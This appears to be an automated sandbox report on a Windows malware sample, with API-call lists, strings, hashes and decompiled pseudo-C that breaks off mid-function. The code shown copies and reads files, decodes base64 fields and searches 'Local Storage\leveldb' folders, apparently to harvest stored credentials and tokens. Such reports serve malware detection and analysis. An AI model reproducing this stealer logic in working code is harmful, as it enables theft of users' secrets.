Instruction ID: cba1c118b683afbb4c237a2ea3f647aca6d71ed8799415d66fa5e3b650ea6752
Opcode Fuzzy Hash: c347b1fdb9411f0377ae06d25071878c0b98999e07dbfde932e6c7133de201cd
Instruction Fuzzy Hash: C7211A378B88BB06DB518F719C1872A27D3DBC7206FAF85B5C68487653E23E90039665

Uniqueness

Uniqueness Score: -1.00%

Function 00415AE0 Relevance: 77.3, APIs: 39, Strings: 5, Instructions: 276stringmemoryfileCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00415B16
lstrcat.KERNEL32(?,025C13D0), ref: 00415B2C

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00415B47
CopyFileA.KERNEL32(?,?,00000001), ref: 00415B57
_memset.LIBCMT ref: 00415B6B
lstrcat.KERNEL32(?,00443C68), ref: 00415B7F
lstrcat.KERNEL32(?,025C6450), ref: 00415B93
lstrcat.KERNEL32(?,00443C68), ref: 00415BA5
lstrcat.KERNEL32(?,?), ref: 00415BB3
lstrcat.KERNEL32(?,00445E84), ref: 00415BC5
lstrcat.KERNEL32(?,?), ref: 00415BD3
lstrcat.KERNEL32(?,.txt), ref: 00415BE5
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00415C39
HeapAlloc.KERNEL32(00000000), ref: 00415C40
StrCmpCA.SHLWAPI(00000000,00445694), ref: 00415CF5
_memset.LIBCMT ref: 00415D04
_memset.LIBCMT ref: 00415D13
lstrcat.KERNEL32(00000000,FALSE), ref: 00415D21
StrCmpCA.SHLWAPI(00000000,00445694), ref: 00415D2D
_memset.LIBCMT ref: 00415D3C
_memset.LIBCMT ref: 00415D4B
lstrcat.KERNEL32(00000000,FALSE), ref: 00415D59
lstrcat.KERNEL32(?,00000000), ref: 00415D67
lstrcat.KERNEL32(?,00445E70), ref: 00415D79
lstrcat.KERNEL32(?,00000000), ref: 00415D87
lstrcat.KERNEL32(?,00445E70), ref: 00415D99
lstrcat.KERNEL32(?,?), ref: 00415DAD
lstrcat.KERNEL32(?,00445E70), ref: 00415DBF
lstrcat.KERNEL32(?,00000000), ref: 00415DCD
lstrcat.KERNEL32(?,00445E70), ref: 00415DDF
lstrcat.KERNEL32(?,?), ref: 00415DF3
lstrcat.KERNEL32(?,00445E70), ref: 00415E05
lstrcat.KERNEL32(?,?), ref: 00415E19
lstrcat.KERNEL32(?,00445E70), ref: 00415E2B
lstrcat.KERNEL32(?,?), ref: 00415E3F
lstrcat.KERNEL32(?,00443C5C), ref: 00415E51
lstrlen.KERNEL32(?), ref: 00415E77
_memset.LIBCMT ref: 00415EA3
DeleteFileA.KERNEL32(?), ref: 00415ECF

Strings

.txt, xrefs: 00415BD9
FALSE, xrefs: 00415D1B, 00415D53
TRUE, xrefs: 00415D0C, 00415D44
ZHaZea, xrefs: 00415C53, 00415E5E
cA, xrefs: 00415AF3

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeap$AllocCopyCountDeleteProcessTick_malloc_randlstrlenwsprintf
String ID: .txt$FALSE$TRUE$ZHaZea$cA
API String ID: 1113739872-1558314747
Opcode ID: 5d19729a4a3da52c87b005a467db4e453f7c62f239368e0f390459c62e5521f7
Instruction ID: 03a847d2c50113737349fe1bc9f0ee9f54322cd2d38871a30aa2ddf751deba58
Opcode Fuzzy Hash: 5d19729a4a3da52c87b005a467db4e453f7c62f239368e0f390459c62e5521f7
Instruction Fuzzy Hash: BAB18475A4031CABCB50EFA0EC8DFDA7778BF99701F100599F509A3241E6B49A80CF69

Uniqueness

Uniqueness Score: -1.00%

Function 0040B3B0 Relevance: 67.8, APIs: 45, Instructions: 277
stringCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E0040B3B0(void* __ebx, void* __edi, void* __eflags, char* _a8) {
				signed int _v8;
				char _v1008;
				char _v2008;
				char _v3008;
				char _v4008;
				char _v5008;
				char _v6008;
				char _v7008;
				char _v8008;
				char _v9008;
				void* _v9009;
				intOrPtr _v9016;
				void* __esi;
				signed int _t75;
				intOrPtr _t89;
				intOrPtr _t94;
				intOrPtr _t156;
				intOrPtr _t183;
				intOrPtr _t185;
				void* _t202;
				char* _t203;
				signed int _t204;
				void* _t205;
				void* _t207;
				char* _t210;
				char* _t212;

				_t202 = __edi;
				_t151 = __ebx;
				E0042BC40(0x2334);
				_t75 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t75 ^ _t204;
				_t203 = _a8;
				E0042A2F0( &_v4008, 0, 0x3e8);
				E0042A2F0( &_v6008, 0, 0x3e8);
				E0042A2F0( &_v9008, 0, 0x3e8);
				E0042A2F0( &_v8008, 0, 0x3e8);
				E0042A2F0( &_v5008, 0, 0x3e8);
				E0042A2F0( &_v1008, 0, 0x3e8);
				E0042A2F0( &_v3008, 0, 0x3e8);
				E0042A2F0( &_v2008, 0, 0x3e8);
				E0042A2F0( &_v7008, 0, 0x3e8);
				_t89 =  *0x453ad8; // 0x25c86e0
				_t207 = _t205 + 0x6c;
				 *0x464860( &_v4008, _t89);
				_t183 =  *0x453640; // 0x25c8c18
				 *0x464860( &_v6008, _t183);
				_t156 =  *0x453928; // 0x25c8730
				 *0x464860( &_v9008, _t156);
				_t94 =  *0x453374; // 0x25c0598
				 *0x464860( &_v8008, _t94);
				_t185 =  *0x45381c; // 0x25c8b70
				 *0x464860( &_v5008, _t185);
				 *0x464860( &_v1008, _t203);
				 *0x464860( &_v1008, "\\");
				 *0x464860( &_v1008,  &_v6008);
				 *0x464860( &_v1008, "\\");
				 *0x464860( &_v1008,  &_v9008);
				 *0x464860( &_v1008, "\\");
				 *0x464860( &_v1008,  &_v8008);
				 *0x464860( &_v3008, _t203);
				 *0x464860( &_v3008, "\\");
				 *0x464860( &_v3008,  &_v6008);
				 *0x464860( &_v3008, "\\");
				 *0x464860( &_v3008,  &_v9008);
				 *0x464860( &_v2008, _t203);
				 *0x464860( &_v2008, "\\");
				 *0x464860( &_v2008,  &_v5008);
				 *0x464860( &_v2008, "\\");
				 *0x464860( &_v2008,  &_v8008);
				 *0x464860( &_v7008, _t203);
				 *0x464860( &_v7008, "\\");
				 *0x464860( &_v7008,  &_v5008);
				if(E004205C0( &_v1008) != 0) {
					_push( &_v6008);
					_push( &_v3008);
					_t212 = _t207 - 0x1c;
					_t203 = _t212;
					_v9016 = _t212;
					 *((intOrPtr*)(_t203 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t203 + 0x10)) = 0;
					 *_t203 = 0;
					E00404BC0(_t203,  &_v4008, E0042BC70( &_v4008));
					E0040B190(__ebx);
					_t207 = _t212 + 0x28;
				}
				if(E004205C0( &_v2008) != 0) {
					_push( &_v5008);
					_push( &_v7008);
					_t210 = _t207 - 0x1c;
					_t203 = _t210;
					_v9016 = _t210;
					 *((intOrPtr*)(_t203 + 0x14)) = 0xf;
					 *((intOrPtr*)(_t203 + 0x10)) = 0;
					 *_t203 = 0;
					E00404BC0(_t203,  &_v4008, E0042BC70( &_v4008));
					E0040B190(_t151);
					_t207 = _t210 + 0x28;
				}
				E0042A2F0( &_v4008, 0, 0x3e8);
				E0042A2F0( &_v6008, 0, 0x3e8);
				E0042A2F0( &_v9008, 0, 0x3e8);
				E0042A2F0( &_v8008, 0, 0x3e8);
				E0042A2F0( &_v5008, 0, 0x3e8);
				E0042A2F0( &_v1008, 0, 0x3e8);
				E0042A2F0( &_v3008, 0, 0x3e8);
				E0042A2F0( &_v2008, 0, 0x3e8);
				return E0042A36A(E0042A2F0( &_v7008, 0, 0x3e8), _t151, _v8 ^ _t204,  &_v7008, _t202, _t203);
			}

0x0040b3b0
0x0040b3b0
0x0040b3b8
0x0040b3bd
0x0040b3c4
0x0040b3c8
0x0040b3d9
0x0040b3ec
0x0040b3ff
0x0040b412
0x0040b425
0x0040b438
0x0040b44e
0x0040b461
0x0040b474
0x0040b479
0x0040b47e
0x0040b489
0x0040b48f
0x0040b49d
0x0040b4a3
0x0040b4b1
0x0040b4b7
0x0040b4c4
0x0040b4ca
0x0040b4d8
0x0040b4e6
0x0040b4f8
0x0040b50c
0x0040b51e
0x0040b532
0x0040b544
0x0040b558
0x0040b566
0x0040b578
0x0040b58c
0x0040b59e
0x0040b5b2
0x0040b5c0
0x0040b5d2
0x0040b5e6
0x0040b5f8
0x0040b60c
0x0040b61a
0x0040b62c
0x0040b640
0x0040b65a
0x0040b662
0x0040b669
0x0040b66a
0x0040b66d
0x0040b675
0x0040b67b
0x0040b682
0x0040b68a
0x0040b69f
0x0040b6a4
0x0040b6a9
0x0040b6a9
0x0040b6c0
0x0040b6c8
0x0040b6cf
0x0040b6d0
0x0040b6d3
0x0040b6db
0x0040b6e1
0x0040b6e8
0x0040b6f0
0x0040b705
0x0040b70a
0x0040b70f
0x0040b70f
0x0040b720
0x0040b733
0x0040b746
0x0040b759
0x0040b76c
0x0040b77f
0x0040b795
0x0040b7a8
0x0040b7d1

APIs

_memset.LIBCMT ref: 0040B3D9
_memset.LIBCMT ref: 0040B3EC
_memset.LIBCMT ref: 0040B3FF
_memset.LIBCMT ref: 0040B412
_memset.LIBCMT ref: 0040B425
_memset.LIBCMT ref: 0040B438
_memset.LIBCMT ref: 0040B44E
_memset.LIBCMT ref: 0040B461
_memset.LIBCMT ref: 0040B474
lstrcat.KERNEL32(?,025C86E0), ref: 0040B489
lstrcat.KERNEL32(?,025C8C18), ref: 0040B49D
lstrcat.KERNEL32(?,025C8730), ref: 0040B4B1
lstrcat.KERNEL32(?,025C0598), ref: 0040B4C4
lstrcat.KERNEL32(?,025C8B70), ref: 0040B4D8
lstrcat.KERNEL32(?,?), ref: 0040B4E6
lstrcat.KERNEL32(?,00443C68), ref: 0040B4F8
lstrcat.KERNEL32(?,?), ref: 0040B50C
lstrcat.KERNEL32(?,00443C68), ref: 0040B51E
lstrcat.KERNEL32(?,?), ref: 0040B532
lstrcat.KERNEL32(?,00443C68), ref: 0040B544
lstrcat.KERNEL32(?,?), ref: 0040B558
lstrcat.KERNEL32(?,?), ref: 0040B566
lstrcat.KERNEL32(?,00443C68), ref: 0040B578
lstrcat.KERNEL32(?,?), ref: 0040B58C
lstrcat.KERNEL32(?,00443C68), ref: 0040B59E
lstrcat.KERNEL32(?,?), ref: 0040B5B2
lstrcat.KERNEL32(?,?), ref: 0040B5C0
lstrcat.KERNEL32(?,00443C68), ref: 0040B5D2
lstrcat.KERNEL32(?,?), ref: 0040B5E6
lstrcat.KERNEL32(?,00443C68), ref: 0040B5F8
lstrcat.KERNEL32(?,?), ref: 0040B60C
lstrcat.KERNEL32(?,?), ref: 0040B61A
lstrcat.KERNEL32(?,00443C68), ref: 0040B62C
lstrcat.KERNEL32(?,?), ref: 0040B640

Part of subcall function 004205C0: GetFileAttributesA.KERNEL32(0040B658,?,0040B658,?), ref: 004205C7

_strlen.LIBCMT ref: 0040B68D

Part of subcall function 0040B190: GetProcessHeap.KERNEL32(00000000,0098967F,C21D6F0A), ref: 0040B1CE
Part of subcall function 0040B190: HeapAlloc.KERNEL32(00000000), ref: 0040B1D5
Part of subcall function 0040B190: wsprintfA.USER32 ref: 0040B1EE
Part of subcall function 0040B190: FindFirstFileA.KERNEL32(?,?), ref: 0040B205

_strlen.LIBCMT ref: 0040B6F3
_memset.LIBCMT ref: 0040B720
_memset.LIBCMT ref: 0040B733
_memset.LIBCMT ref: 0040B746
_memset.LIBCMT ref: 0040B759
_memset.LIBCMT ref: 0040B76C
_memset.LIBCMT ref: 0040B77F
_memset.LIBCMT ref: 0040B795
_memset.LIBCMT ref: 0040B7A8
_memset.LIBCMT ref: 0040B7BB

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$_memset$FileHeap_strlen$AllocAttributesFindFirstProcesswsprintf
String ID:
API String ID: 3021494306-0
Opcode ID: 4b5a6a63f8cb815727d688d5688d697eff6aa6c8ad9eb88cba76f37c2f35e4b9
Instruction ID: e25a557d370b42246d9c06f2059a3aef8aa439690eecb8e8a254a1dbc6ae4df7
Opcode Fuzzy Hash: 4b5a6a63f8cb815727d688d5688d697eff6aa6c8ad9eb88cba76f37c2f35e4b9
Instruction Fuzzy Hash: FBB17476A40318ABCB60EB61DC85FDD77BCAB89704F4049D9F609670C0EBB4A7448F69

Uniqueness

Uniqueness Score: -1.00%

Function 00415830 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 203
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E00415830(intOrPtr _a8, char* _a12, char _a16) {
				signed int _v8;
				char _v268;
				void* _v272;
				intOrPtr _v276;
				char* _v280;
				long _v284;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				void* _t31;
				void* _t43;
				char* _t45;
				char* _t49;
				char* _t50;
				intOrPtr _t55;
				char* _t59;
				char* _t61;
				char* _t67;
				char* _t68;
				void* _t69;
				void* _t72;
				char* _t75;
				void* _t77;
				void* _t78;
				char* _t79;
				intOrPtr _t85;
				intOrPtr _t88;
				char* _t89;
				intOrPtr _t90;
				char* _t91;
				char* _t94;
				char* _t96;
				char* _t97;
				char* _t98;
				long _t99;
				char* _t100;
				char* _t103;
				char* _t106;
				intOrPtr _t108;
				signed int _t109;
				void* _t110;
				void* _t111;
				void* _t112;
				void* _t113;
				void* _t114;

				_t28 =  *0x451f00; // 0xc21d6f0a
				_v8 = _t28 ^ _t109;
				_t3 =  &_a16; // 0x41644b
				_t108 =  *_t3;
				_t98 = _a12;
				_v276 = _a8;
				_t31 =  *0x453da4(_t98);
				_t111 = _t110 + 4;
				if(_t31 == 0) {
					_push(0x453d70);
					_t31 = E0042D020();
					_t112 = _t111 + 4;
					if(_t31 < 0x20) {
						E0042A2F0( &_v268, 0, 0x104);
						_t113 = _t112 + 0xc;
						 *0x464860( &_v268, _t98, _t77);
						 *0x464860( &_v268, "\\");
						_t85 =  *0x453bb0; // 0x25c6308
						_t92 =  &_v268;
						 *0x464860( &_v268, _t85);
						_t78 = CreateFileA( &_v268, 0x80000000, 1, 0, 3, 0, 0);
						_v272 = _t78;
						_t118 = _t78;
						if(_t78 != 0) {
							SetFilePointer(_t78, 0, 0, 2);
							_t99 = GetFileSize(_t78, 0);
							SetFilePointer(_t78, 0, 0, 0);
							_t12 = _t99 + 1; // 0x1
							_t43 = E0042976C(_t99, _t108, _t118);
							_t114 = _t113 + 4;
							_t92 =  &_v284;
							_v280 = _t43;
							ReadFile(_t78, _t43, _t99,  &_v284, 0);
							_t45 =  *0x453490; // 0x25c60e0
							_t98 = StrStrA(_v280, _t45);
							if(_t98 != 0) {
								do {
									_t94 =  *0x453490; // 0x25c60e0
									_t17 =  *0x464758(_t94) + 3; // 0x3
									_t79 = _t98 + _t17;
									_t49 =  *0x453708; // 0x25c6290
									_t50 = StrStrA(_t79, _t49);
									_t100 = _t50;
									 *((char*)(_t100 - 3)) = 0;
									 *0x464860(_t108, "\n");
									_t88 =  *0x4537b8; // 0x25c86a0
									 *0x464860(_t108, _t88);
									 *0x464860(_t108, _v276);
									 *0x464860(_t108, "\n");
									_t55 =  *0x453ac0; // 0x25c8880
									 *0x464860(_t108, _t55);
									 *0x464860(_t108, _t79);
									 *0x464860(_t108, "\n");
									_t89 =  *0x453954; // 0x25c5ce0
									_t59 = StrStrA( &(_t100[0xfffffffffffffffe]), _t89);
									_t96 =  *0x453954; // 0x25c5ce0
									_t21 =  *0x464758(_t96) + 3; // 0x3
									_t61 =  *0x453950; // 0x25c5e80
									_t103 = StrStrA( &(_t59[_t21]), _t61);
									 *((char*)(_t103 - 3)) = 0;
									_t90 =  *0x453578; // 0x25c8690
									 *0x464860(_t108, _t90);
									 *0x464860(_t108, E00414D80( &(_t59[_t21]),  &(_t59[_t21])));
									 *0x464860(_t108, "\n");
									_t97 =  *0x453950; // 0x25c5e80
									_t67 = StrStrA(_t103 + 0xfffffffe, _t97);
									_t68 =  *0x453950; // 0x25c5e80
									_t69 =  *0x464758(_t68);
									_t91 =  *0x453ad4; // 0x25c6530
									_t24 = _t69 + 3; // 0x3
									_t106 = StrStrA( &(_t67[_t24]), _t91);
									 *((char*)(_t106 - 3)) = 0;
									_t92 =  *0x453a7c; // 0x25c9270
									 *0x464860(_t108, _t92);
									_t72 = E00414D80( &(_t67[_t24]),  &(_t67[_t24]));
									_t114 = _t114 + 8;
									 *0x464860(_t108, _t72);
									 *0x464860(_t108, "\n\n");
									_t75 =  *0x453490; // 0x25c60e0
									_t98 = StrStrA(_t106 + 0xfffffffe, _t75);
								} while (_t98 != 0);
								_t78 = _v272;
							}
							CloseHandle(_t78);
						}
						_t31 =  *0x453dc4();
						_pop(_t77);
					}
				}
				return E0042A36A(_t31, _t77, _v8 ^ _t109, _t92, _t98, _t108);
			}

0x00415839
0x00415840
0x00415847
0x00415847
0x0041584b
0x0041584f
0x00415855
0x0041585b
0x00415860
0x00415866
0x0041586b
0x00415870
0x00415876
0x0041588b
0x00415890
0x0041589b
0x004158ad
0x004158b3
0x004158ba
0x004158c1
0x004158e3
0x004158e5
0x004158eb
0x004158ed
0x004158fa
0x00415910
0x00415912
0x00415918
0x0041591c
0x00415921
0x00415926
0x00415930
0x00415936
0x0041593c
0x0041594f
0x00415953
0x00415960
0x00415960
0x0041596d
0x0041596d
0x00415971
0x00415978
0x00415983
0x00415986
0x0041598a
0x00415990
0x00415998
0x004159a6
0x004159b2
0x004159b8
0x004159bf
0x004159c7
0x004159d3
0x004159d9
0x004159e4
0x004159ea
0x004159f9
0x004159fd
0x00415a0a
0x00415a0c
0x00415a10
0x00415a18
0x00415a29
0x00415a35
0x00415a3b
0x00415a46
0x00415a4e
0x00415a54
0x00415a5a
0x00415a60
0x00415a6c
0x00415a6e
0x00415a72
0x00415a7a
0x00415a81
0x00415a86
0x00415a8b
0x00415a97
0x00415a9d
0x00415aad
0x00415aaf
0x00415ab7
0x00415ab7
0x00415abe
0x00415abe
0x00415ac4
0x00415aca
0x00415aca
0x00415876
0x00415ada

APIs

_memset.LIBCMT ref: 0041588B
lstrcat.KERNEL32(?,?), ref: 0041589B
lstrcat.KERNEL32(?,00443C68), ref: 004158AD
lstrcat.KERNEL32(?,025C6308), ref: 004158C1
CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,00417D07), ref: 004158DD
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,00417D07), ref: 004158FA
GetFileSize.KERNEL32(00000000,00000000,?,?,00417D07), ref: 00415903
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,00417D07), ref: 00415912
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00417D07), ref: 00415936
StrStrA.SHLWAPI(?,025C60E0,?,?,?,00417D07), ref: 00415949
lstrlen.KERNEL32(025C60E0,?,?,?,00417D07), ref: 00415967
StrStrA.SHLWAPI(00000003,025C6290,?,?,?,00417D07), ref: 00415978
lstrcat.KERNEL32(KdA,00443C5C), ref: 0041598A
lstrcat.KERNEL32(KdA,025C86A0), ref: 00415998
lstrcat.KERNEL32(KdA,?), ref: 004159A6
lstrcat.KERNEL32(KdA,00443C5C), ref: 004159B2
lstrcat.KERNEL32(KdA,025C8880), ref: 004159BF
lstrcat.KERNEL32(KdA,00000003), ref: 004159C7
lstrcat.KERNEL32(KdA,00443C5C), ref: 004159D3
StrStrA.SHLWAPI(-000000FE,025C5CE0,?,?,?,00417D07), ref: 004159E4
lstrlen.KERNEL32(025C5CE0,?,?,?,00417D07), ref: 004159F3
StrStrA.SHLWAPI(00000003,025C5E80,?,?,?,00417D07), ref: 00415A04
lstrcat.KERNEL32(KdA,025C8690), ref: 00415A18

Part of subcall function 00414D80: _memset.LIBCMT ref: 00414DB9
Part of subcall function 00414D80: lstrlen.KERNEL32(00415A24,00000001,?,?,00000000,00000000,?,00415A24,00000003,?,?,?,00417D07), ref: 00414DD6
Part of subcall function 00414D80: CryptStringToBinaryA.CRYPT32(00415A24,00000000,?,00415A24,00000003), ref: 00414DDE

lstrcat.KERNEL32(KdA,00000000), ref: 00415A29
lstrcat.KERNEL32(KdA,00443C5C), ref: 00415A35
StrStrA.SHLWAPI(-000000FE,025C5E80,?,?,?,?,00417D07), ref: 00415A46
lstrlen.KERNEL32(025C5E80,?,?,?,?,00417D07), ref: 00415A54
StrStrA.SHLWAPI(00000003,025C6530,?,?,?,?,00417D07), ref: 00415A66
lstrcat.KERNEL32(KdA,025C9270), ref: 00415A7A

Part of subcall function 00414D80: lstrcat.KERNEL32(00443C1C,00443C1C), ref: 00414EB2

lstrcat.KERNEL32(KdA,00000000), ref: 00415A8B
lstrcat.KERNEL32(KdA,004458A8), ref: 00415A97
StrStrA.SHLWAPI(-000000FE,025C60E0,?,?,?,?,?,00417D07), ref: 00415AA7
CloseHandle.KERNEL32(00000000,?,?,?,00417D07), ref: 00415ABE

Strings

KdA, xrefs: 00415847, 00415985, 00415997, 004159A5, 004159B1, 004159BE, 004159C6, 004159D2, 00415A17, 00415A28, 00415A34, 00415A79, 00415A8A, 00415A96

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$File$lstrlen$Pointer_memset$BinaryCloseCreateCryptHandleReadSizeString
String ID: KdA
API String ID: 2877706360-2210686102
Opcode ID: 1a8ee224eb5e0c9a7b5a13846dd528f335f9ca919d7f98d5fc8652f019b9fb95
Instruction ID: f043dda45265040890733d9ed9445690089ead4b11e920d66c7c2f30caf7f04e
Opcode Fuzzy Hash: 1a8ee224eb5e0c9a7b5a13846dd528f335f9ca919d7f98d5fc8652f019b9fb95
Instruction Fuzzy Hash: B471CC75500308BBD740EF60FC49FAA77B8FBCA742F044525F50193251EBB49A458B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004167D9 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 206stringfileCOMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,004456B0), ref: 004167F5
StrCmpCA.SHLWAPI(?,004456AC), ref: 0041680F
_memset.LIBCMT ref: 0041682B
_memset.LIBCMT ref: 0041683E
lstrcat.KERNEL32(?,?), ref: 0041684E
lstrcat.KERNEL32(?,00443C68), ref: 00416860
lstrcat.KERNEL32(?,?), ref: 00416874
lstrcat.KERNEL32(?,00443C68), ref: 00416886
lstrcat.KERNEL32(?,025C1218), ref: 004168AF
lstrcat.KERNEL32(?,00443C68), ref: 004168C1
lstrcat.KERNEL32(?,00000003), ref: 004168CF
lstrcat.KERNEL32(?,00443C68), ref: 004168E1
lstrcat.KERNEL32(?,025C67D8), ref: 004168EF
lstrcat.KERNEL32(?,00443C68), ref: 00416901
lstrcat.KERNEL32(?,?), ref: 00416915
lstrcat.KERNEL32(?,00443C68), ref: 0041693B
lstrcat.KERNEL32(?,025C6C50), ref: 004169B3
lstrcat.KERNEL32(?,00443C68), ref: 004169C5
lstrcat.KERNEL32(?,?), ref: 004169D9
_memset.LIBCMT ref: 004169ED
lstrcat.KERNEL32(?,025C13D0), ref: 00416A02

Part of subcall function 00420520: _malloc.LIBCMT ref: 00420529
Part of subcall function 00420520: GetTickCount.KERNEL32 ref: 00420536
Part of subcall function 00420520: _rand.LIBCMT ref: 00420550
Part of subcall function 00420520: wsprintfA.USER32 ref: 00420565

lstrcat.KERNEL32(?,00000000), ref: 00416A1D
CopyFileA.KERNEL32(?,?,00000001), ref: 00416A33

Part of subcall function 004205F0: CreateFileA.KERNEL32(0040C2C0,80000000,00000003,00000000,00000003,00000080,00000000,?,0040C2C0,?), ref: 0042060D
Part of subcall function 004205F0: GetFileSizeEx.KERNEL32(00000000,?), ref: 0042061F
Part of subcall function 004205F0: CloseHandle.KERNEL32(00000000), ref: 0042062A

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00416A54
StrCmpCA.SHLWAPI(00000003,025C6D80,?), ref: 00416A69
StrCmpCA.SHLWAPI(00000003,025C7688), ref: 00416A80
DeleteFileA.KERNEL32(?), ref: 00416AB6
FindNextFileA.KERNEL32(?,?), ref: 00416ACA
FindClose.KERNEL32(?), ref: 00416ADF

Strings

Local Storage\leveldb, xrefs: 004169A7

Memory Dump Source

Source File: 00000000.00000002.412273904.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.412273904.0000000000464000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.412273904.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File

Yara matches

Similarity

API ID: lstrcat$File$_memset$CloseFind$CopyCountCreateDeleteHandleNextSizeTickUnothrow_t@std@@@__ehfuncinfo$??2@_malloc_randwsprintf
String ID: Local Storage\leveldb
API String ID: 364397426-1452852158
Opcode ID: dc47f9081ab9a9d1fb72907ef4ca58be625f3afac308574bcb4386d1df8122bf
Instruction ID: 21a2f0dc00bda8d3bd84ab8341cf61683676df031c6460b82b7f09ad59c836d0
Opcode Fuzzy Hash: dc47f9081ab9a9d1fb72907ef4ca58be625f3afac308574bcb4386d1df8122bf
Instruction Fuzzy Hash: D98165B660431CABCB50EFA0EC89EDA7378BB99702F004999F54593051EBB497C4CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040B880 Relevance: 45.8, APIs: 23, Strings: 3, Instructions: 350
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040B880(void* __eflags, char _a4, intOrPtr _a24) {
				char _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v28;
				char _v32;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t43;
				signed int _t44;
				void* _t48;
				void* _t50;
				void* _t52;
				intOrPtr _t54;
				void* _t55;
				intOrPtr _t57;
				void* _t58;
				intOrPtr _t60;
				void* _t61;
				intOrPtr _t63;
				void* _t64;
				intOrPtr _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t70;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t76;
				intOrPtr _t78;
				void* _t79;
				intOrPtr _t81;
				void* _t82;
				intOrPtr _t84;
				void* _t85;
				intOrPtr _t87;
				void* _t88;
				intOrPtr _t90;
				void* _t91;
				intOrPtr _t93;
				void* _t94;
				intOrPtr _t96;
				void* _t97;
				intOrPtr _t99;
				void* _t100;
				intOrPtr _t102;
				void* _t103;
				intOrPtr _t105;
				void* _t106;
				intOrPtr _t108;
				void* _t109;
				intOrPtr _t111;
				void* _t112;
				void* _t120;
				void* _t152;
				void* _t153;
				void* _t176;
				signed int _t177;
				void* _t178;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t183;
				void* _t184;
				void* _t185;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t198;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;

				_push(0xffffffff);
				_push(E0043E028);
				_push( *[fs:0x0]);
				_t43 =  *0x451f00; // 0xc21d6f0a
				_t44 = _t43 ^ _t177;
				_v20 = _t44;
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_v8 = 0;
				_t152 = 0;
				_v28 = 0xf;
				_v32 = 0;
				_v48 = 0;
				E00404AD0( &_v48,  &_a4, 0, 0xffffffff);
				_t48 = E0042BC70("C:\\Windows\\");
				_t180 = _t178 - 0x20 + 4;
				if(E0040A2A0( &_v48, "C:\\Windows\\", 0, _t48) != 0xffffffff) {
					_t152 = 1;
				}
				_t50 = E0042BC70("C:\\\\Windows\\");
				_t181 = _t180 + 4;
				if(E0040A2A0( &_v48, "C:\\\\Windows\\", 0, _t50) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t52 = E0042BC70("C:\\\\\\Windows\\");
				_t182 = _t181 + 4;
				if(E0040A2A0( &_v48, "C:\\\\\\Windows\\", 0, _t52) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t54 =  *0x453a94; // 0x25c63e0
				_t55 = E0042BC70(_t54);
				_t183 = _t182 + 4;
				if(E0040A2A0( &_v48, _t54, 0, _t55) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t57 =  *0x453998; // 0x25c63c8
				_t58 = E0042BC70(_t57);
				_t184 = _t183 + 4;
				if(E0040A2A0( &_v48, _t57, 0, _t58) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t60 =  *0x4539a4; // 0x25c1528
				_t61 = E0042BC70(_t60);
				_t185 = _t184 + 4;
				if(E0040A2A0( &_v48, _t60, 0, _t61) != 0xffffffff) {
					_t152 = _t152 + 1;
				}
				_t63 =  *0x453678; // 0x25c63b0
				_t64 = E0042BC70(_t63);
				_t186 = _t185 + 4;
